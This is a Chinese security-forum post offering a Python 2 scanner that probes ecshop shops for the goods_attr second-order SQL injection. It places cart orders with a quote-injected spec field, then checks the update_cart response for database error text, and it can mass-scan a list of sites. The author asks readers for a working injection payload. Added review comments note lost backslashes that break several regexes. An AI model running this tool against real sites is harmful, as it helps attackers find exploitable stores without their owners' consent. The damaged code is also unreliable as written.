鉴于好久没发帖子了,看到ecshop的goods_attr和goods_attr_id两个二次注入漏洞,于是写了这个小工具。由于不会构造语句,只能写出判断漏洞是否存在的工具,大家海涵;有能构造出语句的,联系我,我再完善一下。
完整代码如下:
#! /usr/bin/env python2.7
#coding=utf-8
# by 少校 (QQ 1006079161), written late on 2013-08-14
# Probe for the ecshop goods_attr / goods_attr_id second-order SQL injection
# Reference: [url]https://forum.90sec.org/viewthread.php?tid=6476&highlight=ecshop[/url]
#
# Python 2 only (print statements, `except Exception, e`, urllib2/cookielib).
# NOTE(review): this listing was extracted from a forum post and several
# backslashes appear to have been lost (see the regex notes below); confirm
# against the original before relying on any of the pattern matches.
#
# Defender's view of what this script leaves in a web log: a burst of POSTs to
# flow.php?step=add_to_cart with sequential goods_id values and a single quote
# inside the spec field, each from a fresh cookie session, followed by one
# step=update_cart POST. The "vulnerable" verdict depends entirely on the
# server echoing MySQL/PHP error text into the page.
import re
import sys
import getopt
import urllib  # imported but never used in this script
import urllib2
import cookielib


def make_order(arg):
    """Try to place a cart order on the ecshop site at ``arg`` and, if one
    succeeds, hand off to goods_attr_sqlinjection().

    POSTs a ``goods=`` JSON body to ``<arg>/flow.php?step=add_to_cart`` for
    goods_id 1, 2, ... 24 and stops at the first response that matches the
    success pattern. Prints progress only; returns None.

    Side effects: assigns the module-level ``mdbhack`` (the goods_id counter)
    and calls urllib2.install_opener() on every iteration, which replaces the
    process-wide opener.
    """
    print u'n当前正在检测%s' % arg  # NOTE(review): the original most likely had '\n' here; the backslash was lost
    global mdbhack
    run = True
    mdbhack = 1
    url = '%s/flow.php?step=add_to_cart' % arg
    while run and mdbhack<25:  # only the first 25 ids are tried, for speed; raise the bound if needed
        # Note the trailing single quote in the second spec value.
        data = '''goods={"quick":1,"spec":["163","163'"],"goods_id":%s,"number":"1","parent":0}''' % mdbhack
        # A fresh cookie jar per attempt, so every goods_id is tried in a new session.
        cookiejar = cookielib.CookieJar()
        urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))
        urllib2.install_opener(urlOpener)
        # after install_opener(), plain urllib2.urlopen() calls also go through this opener
        try:
            httpres = urlOpener.open(url,data,timeout=5)
            html = httpres.read()
            # As written this matches the literal substring "s1s"; the original
            # was presumably a whitespace-delimited "1" (backslashes lost). TODO confirm.
            order_ok = re.search('s1s',html)
            if order_ok:
                print u'[LOG] 自动完成订购订单!'
                goods_attr_sqlinjection(arg)
                run = False
                break
            else:
                print u'[LOG] 自动订购产品id%s失败!' % mdbhack
                mdbhack += 1
                # run is always True on this branch, so the message fires exactly
                # once, when the last id (24) has also failed.
                if mdbhack == 25 and run:
                    print u'[LOG] 抱歉,前25个id的产品全部订购失败,请手动检测吧!'
        except Exception,e:
            # Any network/HTTP error aborts the scan of this host entirely.
            print e
            run = False
            break


def goods_attr_sqlinjection(arg):
    """Check whether the update_cart step of ``<arg>/flow.php`` leaks a
    database error.

    Fetches the cart page, extracts the first ``goods_number[...]`` field
    name, POSTs an update_cart form built from it, and reports the host as
    vulnerable when the response body contains one of a fixed list of
    MySQL/PHP error fragments. Prints only; returns None.

    Notes:
    - ``re.findall(...)[0]`` raises IndexError when nothing matches, so the
      ``if good_numbers:`` guard below never sees an empty result.
    - As written, ``[(.*?)]`` is a regex character class; the original most
      likely escaped the square brackets with backslashes. TODO confirm.
    - The first urlopen() call has no timeout.
    - Detection is purely error-based: a page without these strings is
      reported as "not vulnerable", which only means no error text was
      echoed. Conversely, suppressing error display on the server silences
      this check without fixing the underlying query.
    """
    url = arg+'/flow.php'
    html = urllib2.urlopen(url).read()
    good_numbers = re.findall('''name="goods_number[(.*?)]"''',html)[0]  # build good_numbers
    if good_numbers:
        # goods_number[<id>]=1, the percent-encoded submit button value (GBK bytes,
        # presumably the "update cart" label) and step=update_cart
        data = 'goods_number%5B'+str(good_numbers)+'''%5D=1&submit=%B8%FC%D0%C2%B9%BA%CE%EF%B3%B5&step=update_cart'''
        request = urllib2.Request(url,data)
        httpres = urllib2.urlopen(request,timeout=10)
        html = httpres.read()
        # Signature list: verbose database error text reflected in the page.
        if re.search('server error|report:Array|You have an error|your SQL syntax|the right syntax to use near',html):
            print u'[LOG] 恭喜您存在goods_attr注入漏洞!'
        else:
            print u'[LOG] 不存在此漏洞'


def main(url,file_txt):
    """Dispatch on the parsed options; exactly one of ``url`` / ``file_txt``
    is expected.

    url:      a single site base URL, passed to make_order() after strip().
    file_txt: path to a text file with one base URL per line.

    Both set -> usage banner and exit(1). The file handle is never closed,
    and any exception while reading or scanning prints the error and exits
    with status 1.
    """
    if url and file_txt:
        printerror()
        sys.exit(1)
    if url:
        make_order(url.strip())
    if file_txt:
        try:
            for url in open(file_txt,'r'):
                make_order(url.strip())
        except Exception,e:
            print e
            sys.exit(1)


def printerror():
    """Print the ASCII-art usage banner (``-u <url>`` or ``-f <file>``)."""
    print ''' ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. `+---------------------------^----------| `_,-------, [email]__1006079161@QQ.com______[/email]| / XXXXXX /`| / / XXXXXX / ` / / XXXXXX /______( / XXXXXX / / XXXXXX / (________( For example: `------' scan.py -u [url]http://www.mdbhack.com[/url] scan.py -f ecshop.txt '''


if __name__ == '__main__':
    # Exactly one option with one value is expected (argv length 3); anything
    # else, including a getopt parse error, shows the usage banner and exits.
    url = None
    file_txt = None
    if len (sys.argv) == 3:
        try:
            opts, args = getopt.getopt (sys.argv[1:], "u:f:")  # Assigning Parameters
        except:  # bare except: every getopt failure falls through to the banner
            printerror()
            sys.exit(1)
    else:
        printerror()
        sys.exit(1)
    for opt,arg in opts:  # Traversal
        if opt == '-u':
            url = arg
        elif opt == '-f':
            file_txt = arg
    main(url,file_txt)
作者:少校 90sec